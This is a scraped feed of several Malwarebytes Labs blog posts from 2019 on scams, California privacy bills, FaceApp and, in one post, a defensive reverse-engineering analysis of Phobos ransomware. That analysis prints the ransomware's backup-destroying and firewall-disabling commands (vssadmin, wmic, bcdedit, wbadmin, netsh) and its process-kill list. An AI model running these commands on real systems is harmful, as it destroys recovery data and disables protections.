And perhaps the most important question of all—what will Android Q be named? The list of desserts starting with Q is rather small, and some suggestions that already came up among network users are:

What would you call it? And do you think these changes will better protect user privacy and security? Sound off in the comments.

The post Mobile Menace Monday: Dark Android Q rises appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 22 – 28)

Malwarebytes - Mon, 07/29/2019 - 15:50

Last week on Malwarebytes Labs, we offered an extensive analysis into the Malaysian Airlines Flight 17 investigation, updated users on the newest feature set to AdwCleaner 7.4.0 (it now detects pre-installed software), and provided a deep dive into Phobos ransomware. We also broke down the latest privacy cautions regarding the popular app, FaceApp.

In addition, we looked at an interesting real-life shoe-shining scam that was noticed online, and gave a comprehensive breakdown between stalkerware and parental monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (July 22 – 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Good Twitter Samaritans accidentally prevent shoeshine scam

Malwarebytes - Fri, 07/26/2019 - 16:45

A few days ago, Indian news portals were buzzing with tales of a well-worn shoeshine scam making its way into social media. It’s a great example of how good-natured gestures can unwittingly aid scammers when we combine high-visibility accounts with potential lack of fact checking. Thankfully, it comes with a happy ending for a change.

What happened?

A Twitter user dragged this offline scam into the digital realm by mentioning that they’d run into an individual claiming to be a shoeshine boy. The scam goes as follows: They gently insist on shining your shoes, they refuse any money offered unrelated to said shoe shining (“I’m not begging”), and then they get to work.

While shining the shoes, eventually they mention that their life would change if they could get a shoeshine box. As the discussion continues, they pick the right moment to shift gears, and before you know it, they’re telling you to take them to a specific shop a small journey away, and the confused person with the sparkling shoes is handing over about US$25.

The scam here is that once the victim has gone, the scammer goes back to the shop and gives half the money back. It’s a smart piece of social engineering on the part of the scammer. Aside from anything else, “Please come with me to this random location 15 minutes away” isn’t a safe thing to do at the best of times.

What happened after this hit social media?

Glad you asked. This rather old scam may have played out the same way it always has, except the Twitter user mentioned above caught the attention of some big follower accounts. Hoping to assist the suspect shoeshine boy in their quest to get a shoeshine box, actress Parineeti Chopra went a little further and started mentioning the possibility of job offers. Given her account currently has 13.2 million followers, that’s a massive chunk of syndication for a fakeout.

As we’ve seen many times in the past, this could’ve just as easily been a malware scam, or a phish, or some other awful wheeze at the victim’s expense. When you’re blasting out content to that many people, one hopes it’d be checked beforehand. Alas, it was not. Would the person contacted by the scammer fall for it? Or would things take a different turn?

To the rescue

Weirdly, it took the multi-million follower actress Tweeting out a “help this person” comment for other people to point out that it was a fake [1], [2]. If she hadn’t, the person who first mentioned it might have been parted with their cash.

You can see video of an actual encounter with someone who (it is claimed) is the same individual from the most recent anecdote. Essentially, if you’re in India and you’re approached for a shoeshine: fine. If there’s a sudden mention of shoeshine boxes and immediate trips to another location: politely decline and be on your way.

Summer is here…and so are the scams

This is an interesting case where unintentionally amplifying a scam actually helped to bring it down. You see that happen a fair bit in tech-centric realms, especially with so many scam hunters online and lurking on social media. However, this isn’t quite so common with real-world scams and certainly doesn’t typically play out in real time.

So-called fake news and other forms of misinformation can be incredibly damaging, and it doesn’t have to be at the international level. More commonplace scams targeting regular web users can be just as harmful on an individual level. Given summer is indeed upon us, it’s a good reminder to try and steer clear of scams whether online, offline, or a mixture of both.

The post Good Twitter Samaritans accidentally prevent shoeshine scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Changing California’s privacy law: A snapshot at the support and opposition

Malwarebytes - Thu, 07/25/2019 - 15:59

This month, the corporate-backed, legislative battle against California privacy met a blockade, as one Senate committee voted down and negotiated changes to several bills that, as originally written, could have weakened the state’s data privacy law, the California Consumer Privacy Act.

Though the bills’ authors have raked in thousands of dollars in campaign contributions from companies including Facebook, AT&T, and Google, records portray broader donor networks, which include Political Action Committees (PACs) for real estate, engineering, carpentry, construction, electrical, and municipal workers.

Instead, Big Tech relied on advocacy and lobbying groups to help push favorable legislative measures forward. For example, one bill that aimed to lower restrictions if companies provide consumer data to government agencies was supported by TechNet and Internet Association.

Those two groups alone represent the interests of Amazon—which was caught offering a corporate job to a Pentagon official involved in a $10 billion Department of Defense contract that the company is currently seeking—and Microsoft—another competitor in the same $10 billion contract—along with Google, Twitter, Lyft, Uber, PayPal, Accenture, and Airbnb.

Below is a snapshot of five CCPA-focused bills that were all scheduled for a vote during a July 9 hearing by the California Senate Judiciary Committee. The committee chair, Senator Hannah-Beth Jackson, pulled a 12-hour-plus shift that day, trying to clear through more than 40 bills.

Yet another day in politics.

We hope to provide readers with a look at both the support and opposition to these bills, along with a view of who wrote the bills and what groups have donated to their authors. It is important to remember that lawmaking is rarely a straight line, and a campaign contribution is far from an endorsement.

The assembly bills AB 1416
  • What’s it all about? Exceptions to the CCPA when companies provide consumer data to government agencies
  • Author: Assemblymember Ken Cooley
  • Author’s top 2018 donors: the California Democratic Party ($111,192), the State Building and Construction Trades Council of California PAC Small Contributor Committee ($17,600), the California State Council of Laborers PAC ($17,600).
  • Author’s tech donors: AT&T ($8,800), Facebook ($6,900)
  • Supported by: Internet Association, Technet, Tesla, Symantec, California Land Title Association, California Alliance of Caregivers, among others
  • Opposed by: ACLU of California, Electronic Frontier Foundation, Common Sense Kids Action, and Privacy Rights Clearinghouse

AB 1416 would have created a new exception to the CCPA for any business that “provides a consumer’s personal information to a government agency solely for the purposes of carrying out a government program, if specified requirements are met.”

The bill would have granted companies the option to neglect a consumer’s decision to opt-out of having their data sold to another party, so long as the sale of that consumer’s data was “for the sole purpose of detecting security incidents, protecting against malicious, deceptive, fraudulent, or illegal activity, and prosecuting those responsible for that activity.”

According to multiple privacy groups, those exceptions were too broad. In a letter signed by ACLU of California, EFF, Common Sense Kids Action, and Privacy Rights Clearinghouse, the groups wrote:

“Given the breath of these categories, especially with the increasing use of machine learning and other data-driven algorithms, there is no practical limit on the kinds of data that might be sold for these purposes. It would even allow sales based on the purchaser’s asserted purpose, increasing the potential for abuse, much like the disclosure of millions of Facebook user records by Cambridge Analytica.”

These challenges were never tested with a vote, though, as Asm. Cooley pulled the bill before the committee hearing ended.

AB 873
  • What’s it all about? Changing CCPA’s definition of “deidentified” information
  • Author: Assemblymember Jacqui Irwin
  • Author’s top 2018 donors: California Democratic Party ($105,143), the State Building and Construction Trades Council of California PAC ($17,600), the Professional Engineers in California Government PECG-PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), AT&T ($8,200), Hewlett Packard ($3,700)
  • Supported by: California Chamber of Commerce (sponsor), Internet Association, Technet, Advanced Medical Technology Association, California News Publishers Association, among others
  • Opposed by: ACLU of California, EFF, Campaign for a Commercial-Free Childhood, Access Humboldt, Oakland Privacy, Consumer Reports, among others

AB 873 would have narrowed the scope for what CCPA protects—“personal information”—by broadening the definition of something that CCPA currently does not protect—“deidentified” information.

According to the bill, the definition of “deidentified” information would now include “information that does not identify, and is not reasonably linkable, directly or indirectly, to a particular consumer.”

Privacy advocates claimed the bill had too broad a reach. In a letter, several opponents wrote that AB 873 “would allow businesses to track, profile, recognize, target, and manipulate consumers as they encountered them in both online and offline settings while entirely exempting those practices from the scope of the CCPA, as long as the information used to do so was not tied to a person’s ‘real name,’ ‘SSN’ or similar traditional identifiers.”

During the Senate committee hearing, Asm. Irwin defended her bill by saying that CCPA’s current definition of deidentified information was “unworkable.” She then rebuffed suggestions by the committee chair to add amendments to her bill.

The bill failed to pass on the committee’s 3–3 vote.

AB 25
  • What’s it all about? Exceptions to CCPA for employers that collect data from their employees and job applicants
  • Author: Assemblymember Ed Chau
  • Author’s top 2018 donors: California State Council of Service Employees ($17,600), the California State Council of Laborers ($13,200) the California State Pipe Trades Council ($10,000).
  • Author’s tech donors: Facebook ($4,400), AT&T ($3,900), Hewlett Packard ($3,200), Google ($2,500), Intuit ($2,000)
  • Supported by: Internet Association, Technet, California Chamber of Commerce, National Payroll Reporting Consortium, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Center for Digital Democracy, Oakland privacy, among others

AB 25, as originally written, would have removed CCPA protections for some types of data that employers collect both on their employees and their job applicants.

Hayley Tsukayama, legislative analyst for EFF, said that a concern she and other privacy advocates had with the bill was that employers are beginning to collect more information on their employees that more often resemble consumer-type data.

“We are seeing a lot more of these workplace surveillance programs pop up,” Tsukayama said over the phone, giving a hypothetical example of a fitness tracker for employees where the data could be shared with health insurance companies. “The ways that this collection is being introduced into the workplace, it’s not necessary for the employer-employee relationship, and it is more in the vain of consumer data.”

After Chau agreed to add amendments to his bill, the Senate committee passed it. The bill, if it becomes law, will sunset in one year, giving legislators and labor groups another opportunity to review its impact in a short time.

AB 846
  • What’s it all about? Customer loyalty programs
  • Author: Assemblymember Autumn Burke
  • Author’s top 2018 donors: State Building and Construction Trades Council of California PAC ($17,600), SEIU California State Council Small Contributor Committee ($17,600), IBEW Local 18 Water & Power Defense League ($17,600), California State Council of Laborers PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), Technet California Political Action Committee ($8,449), Charter Communications ($7,900), AT&T and its affiliates ($7,300)
  • Supported by: California Chamber of Commerce, California Grocers Association, California Hotel & Lodging Association, California Restaurant Association, Ralphs Grocery Company, Wine Institute, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Common Sense Kids Action, Privacy Rights Clearinghouse, Access Humboldt

AB 846 targets CCPA’s current non-discrimination clause that prohibits companies from offering incentives—like lowered prices—to customers based on their data practices.

The bill would clarify that CCPA’s regulations are not violated when businesses offer “a different price, rate, level, or quality of goods or services to a consumer if the offering is in connection with a consumer’s voluntary participation in a loyalty, rewards, premium features, discount, or club card program.”

The bill received so many changes though, that some groups were puzzled over what it allows.

“There was a point at which [AB 846] said any service that has a functionality directly related to the collection of, and use, of personal information was exempt,” Tsukayama said. “We spent a lot of time going ‘Well, what does that mean?’ We never got a satisfactory answer.”

She continued: “We were concerned that this would cover a lot of ad tech, or invasive company programs, to collect more data.”

With additional amendments to be added, the Senate committee passed the bill.

AB 1564
  • What’s it all about? Whether businesses have to provide a phone number for consumer data requests
  • Author: Assemblymember Marc Berman
  • Author’s top 2018 donors: California State Council of Service Employees ($26,100), Northern California Carpenters Regional Council SCC ($17,600), American Federation of State, County & Municipal Employees – CA People SCC ($17,600)
  • Author’s tech donors: Facebook ($8,800), TechNet PAC ($6,526)
  • Supported by: Internet Association (sponsor), Engine, Coalition of Small & Disabled Veteran Businesses, Small Business California, National Federation of Independent Businesses (CA), among others
  • Opposed by: ACLU of California, EFF, Center for Digital Democracy, Oakland Privacy, Access Humboldt, Privacy Rights Clearinghouse, among others  

CCPA allows Californians to contact the companies that collect their data and make requests about that data, including accessing it, changing it, and deleting it. The law states that companies must provide at least two methods of contact, including one toll-free telephone number, for those requests.

AB 1564 would allow online-only businesses to provide their direct consumers with just one method of contact—an email address—for data requests.

Privacy advocates previously warned that the bill could make it harder for those with limited Internet access to assert their privacy rights.

The bill, which will be amended, passed the Senate committee.

What comes next?

The California Senate is currently in a summer recess, scheduled to return August 12. The bills that passed the Senate Judiciary Committee—ABs 25, 846, and 1564, regarding employee data, loyalty programs, and email address contacts—will next be heard by the Senate Appropriations Committee, a separate committee of lawmakers who oversee and move forward bills that have a fiscal component.

That committee has until August 30 to move bills to the floor.

Afterwards, either chamber of the state has until September 13 to send a bill to Governor Gavin Newsom’s desk for signature.

The post Changing California’s privacy law: A snapshot at the support and opposition appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A deep dive into Phobos ransomware

Malwarebytes - Wed, 07/24/2019 - 18:09

Phobos ransomware appeared at the beginning of 2019. It has been noted that this new strain of ransomware is strongly based on the previously known family: Dharma (a.k.a. CrySis), and probably distributed by the same group as Dharma.

While attribution is by no means conclusive, you can read more about potential links between Phobos and Dharma here, to include an intriguing connection with the XDedic marketplace.

Phobos is one of the ransomware that are distributed via hacked Remote Desktop (RDP) connections. This isn’t surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.

In this post we will take a look at the implementation of the mechanisms used in Phobos ransomware, as well as at its internal similarity to Dharma.

Analyzed sample


Behavioral analysis

This ransomware does not deploy any techniques of UAC bypass. When we try to run it manually, the UAC confirmation pops up:

If we accept it, the main process deploys another copy of itself, with elevated privileges. It also executes some commands via windows shell.

Ransom notes of two types are being dropped: .txt as well as .hta. After the encryption process is finished, the ransom note in the .hta form is popped up:

Ransom note in the .hta version Ransom note in the .txt version

Even after the initial ransom note is popped up, the malware still runs in the background, and keeps encrypting newly created files.

All local disks, as well as network shares are attacked.

It also uses several persistence mechanisms: installs itself in %APPDATA% and in a Startup folder, adding the registry keys to autostart its process when the system is restarted.

A view from Sysinternals’ Autoruns

Those mechanisms make Phobos ransomware very aggressive: the infection didn’t end on a single run, but can be repeated multiple times. To prevent repeated infection, we should remove all the persistence mechanisms as soon as we noticed that we got attacked by Phobos.

The Encryption Process

The ransomware is able to encrypt files without an internet connection (at this point we can guess that it comes with some hardcoded public key). Each file is encrypted with an individual key or an initialization vector: the same plaintext generates a different ciphertext.

It encrypts a variety of files, including executables. The encrypted files have an e-mail of the attacker added. The particular variant of Phobos also adds an extension ‘.acute’ – however in different variants different extensions have been encountered. The general pattern is: <original name>.id[<victim ID>-<version ID>][<attacker's e-mail>].<added extention>

Visualization of the encrypted content does not display any recognizable patterns. It suggests that either a stream cipher, or a cipher with chained blocks was used (possibly AES in CBC mode). Example – a simple BMP before and after encryption:

When we look inside the encrypted file, we can see a particular block at the end. It is separated from the encrypted content by ‘0’ bytes padding. The first 16 bytes of this block are unique per each file (possible Initialization Vector). Then comes the block of 128 bytes that is the same in each file from the same infection. That possibly means that this block contains the encrypted key, that is uniquely generated each run. At the end we can find a 6-character long keyword which is typical for this ransomware. In this case it is ‘LOCK96’, however, different versions of Phobos have been observed with different keywords, i.e. ‘DAT260’.

In order to fully understand the encryption process, we will look inside the code.


In contrast to most of the malware that comes protected by some crypter, Phobos is not packed or obfuscated. Although the lack of packing is not common in general population of malware, it is common among malware that are distributed manually by the attackers.

The execution starts in WinMain function:

During its execution, Phobos starts several threads, responsible for its different actions, such as: killing blacklisted processes, deploying commands from commandline, encrypting accessible drives and network shares.

Used obfuscation

The code of the ransomware is not packed or obfuscated. However, some constants, including strings, are protected by AES and decrypted on demand. A particular string can be requested by its index, for example:

The AES key used for this purpose is hardcoded (in obfuscated form), and imported each time when a chunk of data needs to be decrypted.

Decrypted content of the AES key

The Initialization Vector is set to 16 NULL bytes.
The code responsible for loading the AES key is given below. The function wraps the key into a BLOBHEADER structure, which is then imported.

From the BLOBHEADER structure we can read the following information: 0x8 – PLAINTEXTKEYBLOB, 0x2=CUR_BLOB_VERSION, 0x6610 – CALG_AES_256.

Example of a decrypted string:

Among the decrypted strings we can also see the list of the attacked extensions

We can also find a list of some keywords:

acute actin Acton actor Acuff Acuna acute adage Adair Adame banhu banjo Banks Banta Barak Caleb Cales Caley calix Calle Calum Calvo deuce Dever devil Devoe Devon Devos dewar eight eject eking Elbie elbow elder phobos help blend bqux com mamba KARLOS DDoS phoenix PLUT karma bbc CAPITAL

These are a list of possible extensions used by this ransomware. They are (probably) used to recognize and skip the files which already has been encrypted by a ransomware from this family. The extension that will be used in the current encryption round is hardcoded.

One of the encrypted strings specifies the formula for the file extension, that is later filled with the Victim ID:

UNICODE ".id[<unique ID>-1096].[].acute"

Killing processes

The ransomware comes with a list of processes that it kills before the encryption is deployed. Just like other strings, the full list is decrypted on demand:

msftesql.exe sqlagent.exe sqlbrowser.exe sqlservr.exe sqlwriter.exe
oracle.exe ocssd.exe dbsnmp.exe synctime.exe agntsvc.exe
mydesktopqos.exe isqlplussvc.exe xfssvccon.exe mydesktopservice.exe
ocautoupds.exe agntsvc.exe agntsvc.exe agntsvc.exe encsvc.exe
firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe
mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe
msaccess.exe mspub.exe onenote.exe outlook.exe powerpnt.exe steam.exe
thebat.exe thebat64.exe thunderbird.exe visio.exe winword.exe

Those processes are killed so that they will not block access to the files that are going to be encrypted.

a fragment of the function enumerating and killing processes Deployed commands

The ransomware deploys several commands from the commandline. Those commands are supposed to prevent from recovering encrypted files from any backups.

Deleting the shadow copies:

vssadmin delete shadows /all /quiet
wmic shadowcopy delete

Changing Bcdedit options (preventing booting the system in a recovery mode):

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no

Deletes the backup catalog on the local computer:

wbadmin delete catalog -quiet

It also disables firewall:

netsh advfirewall set currentprofile state off
netsh firewall set opmode mode=disable
exit Attacked targets

Before the Phobos starts its malicious actions, it checks system locale (using GetLocaleInfoW options: LOCALE_SYSTEM_DEFAULT, LOCALE_FONTSIGNATURE ). It terminates execution in case if the 9th bit of the output is cleared. The 9th bit represent Cyrlic alphabets – so, the systems that have set it as default are not affected.

Both local drives and network shares are encrypted.

Before the encryption starts, Phobos lists all the files, and compare their names against the hardcoded lists. The lists are stored inside the binary in AES encrypted form, strings are separated by the delimiter ‘;’.

Fragment of the function decrypting and parsing the hardcoded lists

Among those lists, we can find i.e. blacklist (those files will be skipped). Those files are related to operating system, plus the info.txt, info.hta files are the names of the Phobos ransom notes:


There is also a list of directories to be skipped – in the analyzed case it contains only one directory: C:\Windows.

Among the skipped files are also the extensions that are used by Phobos variants, that were mentioned before.

There is also a pretty long whitelist of extensions:

1cd 3ds 3fr 3g2 3gp 7z accda accdb accdc accde accdt accdw adb adp ai ai3 ai4 ai5 ai6 ai7 ai8 anim arw as asa asc ascx asm asmx asp aspx asr asx avi avs backup bak bay bd bin bmp bz2 c cdr cer cf cfc cfm cfml cfu chm cin class clx config cpp cr2 crt crw cs css csv cub dae dat db dbf dbx dc3 dcm dcr der dib dic dif divx djvu dng doc docm docx dot dotm dotx dpx dqy dsn dt dtd dwg dwt dx dxf edml efd elf emf emz epf eps epsf epsp erf exr f4v fido flm flv frm fxg geo gif grs gz h hdr hpp hta htc htm html icb ics iff inc indd ini iqy j2c j2k java jp2 jpc jpe jpeg jpf jpg jpx js jsf json jsp kdc kmz kwm lasso lbi lgf lgp log m1v m4a m4v max md mda mdb mde mdf mdw mef mft mfw mht mhtml mka mkidx mkv mos mov mp3 mp4 mpeg mpg mpv mrw msg mxl myd myi nef nrw obj odb odc odm odp ods oft one onepkg onetoc2 opt oqy orf p12 p7b p7c pam pbm pct pcx pdd pdf pdp pef pem pff pfm pfx pgm php php3 php4 php5 phtml pict pl pls pm png pnm pot potm potx ppa ppam ppm pps ppsm ppt pptm pptx prn ps psb psd pst ptx pub pwm pxr py qt r3d raf rar raw rdf rgbe rle rqy rss rtf rw2 rwl safe sct sdpx shtm shtml slk sln sql sr2 srf srw ssi st stm svg svgz swf tab tar tbb tbi tbk tdi tga thmx tif tiff tld torrent tpl txt u3d udl uxdc vb vbs vcs vda vdr vdw vdx vrp vsd vss vst vsw vsx vtm vtml vtx wb2 wav wbm wbmp wim wmf wml wmv wpd wps x3f xl xla xlam xlk xlm xls xlsb xlsm xlsx xlt xltm xltx xlw xml xps xsd xsf xsl xslt xsn xtp xtp2 xyze xz zip

How does the encryption work

Phobos uses the WindowsCrypto API for encryption of files. There are several parallel threads to deploy encryption on each accessible disk or a network share.

Deploying the encrypting thread

AES key is created prior to the encrypting thread being run, and it is passed in the thread parameter.

Fragment of the key generation function:

Calling the function generating the AES key (32 bytes)

Although the AES key is common to all the files that are encrypted in a single round, yet, each file is encrypted with a different initialization vector. The initialization vector is 16 bytes long, generated just before the file is open, and then passed to the encrypting function:

Calling the function generating the AES IV (16 bytes)

Underneath, the AES key and the Initialization Vector both are generated with the help of the same function, that is a wrapper of CryptGenRandom (a strong random generator):

The AES IV is later appended to the content of the encryped file in a cleartext form. We can see it on the following example:

Before the file encryption function is executed, the random IV is being generated:

The AES key, that was passed to the thread is being imported to the context (CryptImportKey), as well the IV is being set. We can see that the read file content is encrypted:

After the content of the file is encrypted, it is being saved into the newly created file, with the ransomware extension.

The ransomware creates a block with metadata, including checksums, and the original file name. After this block, the random IV is being stored, and finally, the block containing the encrypted AES key. The last element is the file marker: “LOCK96”:

Before being written to the file, the metadata block is being encrypted using the same AES key and IV as the file content.

setting the AES key before encrypting the metadata block

Encrypted metadata block:

Finally, the content is appended to the end of the newly created file:

Being a ransomware researcher, the common question that we want to answer is whether or not the ransomware is decryptable – meaning, if it contains the weakness allowing to recover the files without paying the ransom. The first thing to look at is how the encryption of the files is implemented. Unfortunately, as we can see from the above analysis, the used encryption algorithm is secure. It is AES, with a random key and initialization vector, both created by a secure random generator. The used implementation is also valid: the authors decided to use the Windows Crypto API.

Encrypting big files

Phobos uses a different algorithm to encrypt big files (above 0x180000 bytes long). The algorithm explained above was used for encrypting files of typical size (in such case the full file was encrypted, from the beginning to the end). In case of big files, the main algorithm is similar, however only some parts of the content are selected for encryption.

We can see it on the following example. The file ‘test.bin’ was filled with 0xAA bytes. Its original size was 0x77F87FF:

After being encrypted with Phobos, we see the following changes:

Some fragments of the file has been left unencrypted. Between of them, starting from the beginning, some fragments are wiped. Some random-looking block of bytes has been appended to the end of the file, after the original size. We can guess that this is the encrypted content of the wiped fragments. At the very end of the file, we can see a block of data typical for Phobos::

Looking inside we can see the reason of such an alignment. Only 3 chunks from the large file are being read into a buffer. Each chunk is 0x40000 bytes long:

All read chunks are merged together into one buffer. After this content, usual metadata (checksums, original file name) are added, and the full buffer is encrypted:

By this way, authors of Phobos tried to minimize the time taken for encryption of large files, and at the same time maximize the damage done.

How is the AES key protected

The next element that we need to check in order to analyze decryptability is the way in which the authors decided to store the generated key.

In case of Phobos, the AES key is encrypted just after being created. Its encrypted form is later appended at the end of the attacked file (in the aforementioned block of 128 bytes). Let’s take a closer look at the function responsible for encrypting the AES key.

The function generating and protecting the AES key is deployed before the each encrypting thread is started. Looking inside, we can see that first several variables are decrypted, in the same way as the aforementioned strings.

Decryption of the constants

One of the decrypted elements is the following buffer:

It turns out that the decrypted block of 128 bytes is a public RSA key of the attacker. This buffer is then verified with the help of a checksum. A checksum of the RSA key is compared with the hardcoded one. In case if both matches, the size that will be used for AES key generation is set to 32. Otherwise, it is set to 4.

Then, a buffer of random bytes is generated for the AES key.

After being generated, the AES key is protected with the help of the hardcoded public key. This time the authors decided to not use Windows Crypto API, but an external library. Detailed analysis helped us to identify that it is the specific implementation of RSA algorithm (special thanks to Mark Lechtik for the help).

The decrypted 128 bytes long RSA key is imported with the help of the function RSA_pub_key_new. After that, the imported RSA key is used for encryption of the random AES key:

Summing up, the AES key seems to be protected correctly, which is bad news for the victims of this ransomware.

Attacking network shares

Phobos has a separate thread dedicated to attacking network shares.

Network shares are enumerated in a loop:

Comparison with Dharma

Previous sources references Phobos as strongly based on Dharma ransomware. However, that comparison was based mostly on the outer look: a very similar ransom note, and the naming convention used for the encrypted files. The real answer in to this question would lie in the code. Let’s have a look at both, and compare them together. This comparison will be based on the current sample of Phobos, with a Dharma sample (d50f69f0d3a73c0a58d2ad08aedac1c8).

If we compare both with the help of BinDiff, we can see some similarities, but also a lot of mismatching functions.

Fragment of code comparison: Phobos vs Dharma

In contrast to Phobos, Dharma loads the majority of its imports dynamically, making the code a bit more difficult to analyze.

Dharma loads mosts of its imports at the beginning of execution

Addresses of the imported functions are stored in an additional array, and every call takes an additional jump to the value of this array. Example:

In contrast, Phobos has a typical, unobfuscated Import Table

Before the encryption routine is started, Dharma sets a mutex: “Global\syncronize_<hardcoded ID>”.

Both, Phobos and Dharma use the same implementation of the RSA algorithm, from a static library. Fragment of code from Dharma:

The fragment of the function “bi_mod_power” from:

File encryption is implemented similarly in both. However, while Dharma uses AES implementation from the same static library, Phobos uses AES from Windows Crypto API.

Fragment of the AES implementation from Dharma ransomware

Looking at how the key is saved in the file, we can also see some similarities. The protected AES key is stored in the block at the end of the encrypted file. At the beginning of this block we can see some metadata that are similar like in Phobos, for example the original file name (in Phobos this data is encrypted). Then there is a 6 character long identifier, selected from a hardcoded pool.

The block at the end of a file encrypted by Dharma

Such identifier occurs also in Phobos, but there it is stored at the very end of the block. In case of Phobos this identifier is constant for a particular sample.

The block at the end of a file encrypted by Phobos Conclusion

Phobos is an average ransomware, by no means showing any novelty. Looking at its internals, we can conclude that while it is not an exact rip-off Dharma, there are significant similarities between both of them, suggesting the same authors. The overlaps are at the conceptual level, as well as in the same RSA implementation used.

As with other threats, it is important to make sure your assets are secure to prevent such compromises. In this particular case, businesses should review any machines where Remote Desktop Procol (RDP) access has been enabled and either disable it if it is not needed, or making sure the credentials are strong to prevent such things are brute-forcing.

Malwarebytes for business protects against Phobos ransomware via its Anti-Ransomware protection module:

The post A deep dive into Phobos ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

FaceApp scares point to larger data collection problems

Malwarebytes - Wed, 07/24/2019 - 16:38

Last week, if you thumbed your way through Facebook, Instagram, and Twitter, you likely saw altered photos of your friends with a few extra decades written onto their faces—wrinkles added, skin sagged, hair bereft of color.

Has 2019 really been that long? Not really.

The photos are the work of FaceApp, the wildly popular, AI-powered app that lets users “age” pictures of themselves, change their hairstyles, put on glasses, and present a different gender.

Then, seemingly overnight, users, media reports, and members of Congress turned FaceApp into the latest privacy parable: If you care about your online privacy, avoid this app at all costs, they said.  

It’s operated by the Russian government, suggested the investigative outlet Forensic News.

It’s a coverup to train advanced facial recognition software, theorized multiple Twitter users.

It’s worthy of an FBI investigation, said Senator Chuck Schumer of New York.

The truth is less salacious. Here’s what we do know.

FaceApp’s engineers work out of St. Petersburg, Russia, which is not by any means a mark against the company. FaceApp does not, as previously claimed, upload a user’s entire photo roll to servers anywhere in the world. FaceApp’s Terms of Service agreement does not claim to transfer the ownership of a user’s photos to the company, and FaceApp’s CEO said the company would soon update its agreement to more accurately describe that the company does not utilize user content for “commercial purposes.”

Finally, the blowback against FaceApp—for what the company could collect, per its privacy policy, and how it could use that data—is a bit skewed. Countless American companies allow themselves to do the same exact thing today.

“The language you quoted to me, I recommend you look at the terms on Facebook or any other sort of user-generated service, like YouTube,” said Mitch Stoltz, senior staff attorney at Electronic Frontier Foundation, when we read FaceApp’s agreement to him over the phone.  

“It’s almost word-for-word,” Stoltz said. “All that verbiage, in a vacuum, sounds broad, but if you think about it, those are the terms used by almost any website that allows users to upload photos.”

But the takeaway from this week of near-hysteria should not be complacency. Instead, the story of FaceApp should serve as yet another example supporting the always-relevant, sometimes-boring guideline for online privacy: Ask questions first, download later (if at all).

FaceApp’s terms of service agreement

When users download and use FaceApp, they are required to agree to the parent company’s broad Terms of Service agreement. Those terms are extensive:

“You grant FaceApp a perpetual, irrevocable, nonexclusive, royalty-free, worldwide, fully-paid, transferable sub-licensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, publicly perform and display your User Content and any name, username or likeness provided in connection with your User Content in all media formats and channels now known or later developed, without compensation to you.”

Further, users are told through the Terms of Service agreement that “by using the Services, you agree that the User Content may be used for commercial purposes.”

This covers, to put it lightly, a lot. But it is far from unique, Stoltz said.  

“Any website that allows anyone in the world to post photos is going to have a clause like that—‘by uploading photos you give us permissions to do anything with it,’” Stoltz said. “It protects them against all manner of users trying to bring legal claims, where, oh, they only wanted four copies of a photo, not 10 copies. The possibilities are endless.”

Several years ago, CNN dug through some of the most dictatorial terms of service agreements for popular social media platforms, Internet services, and companies, and found that, for example, LinkedIn claimed it could profit from users’ ideas.

Relatedly, Terms of Service, Didn’t Read, which evaluates companies’ user agreements, currently shows that Google and Facebook can use users’ identities in advertisements shown to other users, and that the two companies can also track your online activity across other websites.

Stoltz also clarified that FaceApp’s Terms of Service agreement does not claim to take the copyright of a photo away from whoever took that photo—a process that would be difficult to do in a contract.

“It’s been tried—it’s something the courts don’t like,” Stoltz said.

Stoltz also said that, while consumers do have the option to bring a legal challenge against a contract they allege is unfair, such successful challenges are rare. Stoltz gave one example of where that worked, though: a judge sided with a rental car customer who challenged a company’s extra charge every time the driver sped past the speed limit.

“The court said nuh-uh, you can’t bury that in a contract and expect people to fully understand that,” Stolz said.

As to how FaceApp will actually use user-generated photos, FaceApp CEO Yaroslav Goncharov told Malwarebytes Labs in an email that the company plans to update its terms to better reflect that it does not use any users’ images for “commercial purposes.”

“Even though our policy reserves potential ‘commercial use,’ we don’t use it for any commercial purposes,” Goncharov said. “We are planning to update our privacy policy and TC to reflect this fact.”

Dispelling the rumors

On July 17, United States Sen. Schumer asked the FBI and the Federal Trade Commission to investigate FaceApp because of the app’s popularity, the location of its parent company, and its alleged potential link to foreign intelligence operations in Russia.

The next day, Sen. Schumer spoke directly to consumers in a video shared on Twitter, hammering on the same points:

“The risk that your facial data could also fall into the hands of something like Russian intelligence, or the Russian military apparatus, is disturbing,” Schumer said.

But, according to FaceApp’s CEO, that isn’t true. In responding to questions from The Washington Post, Goncharov said the Russian government has no access to user photos, and, further, that unless a user actually lives in Russia, user data is not located in the country.

Goncharov also told The Washington Post that user photos processed by FaceApp are stored on servers run by Google and Amazon.

In responding to questions from Malwarebytes Labs, Goncharov clarified that the company removes photos from those servers based on a timer, but that sometimes, if there is a large quantity of photos, the removal process can actually take longer than the chosen time limit itself.

“You can set a policy for an [Amazon Simple Storage] bucket that says ‘delete all files that are older than one day.’ In this case, almost all photos may be deleted in 25 hours or so. However, if you have too many incoming photos it can take longer than one hour (or even 24 hours) to delete all photos that are older than 24 hours,” Goncharov said. “[Amazon Web Services] doesn’t provide a guarantee that it takes less than a day to complete a bucket policy. We have a similar situation with Google Cloud.”

Another concern that some users raised about FaceApp was the possibility that the app was accessing and downloading every photo locally stored on a user’s device.

But, again, the rumors proved to be overblown. Cybersecurity researchers and an investigation by Buzzfeed News revealed that the network traffic between FaceApp and its servers did not show any nefarious hoovering of user data.

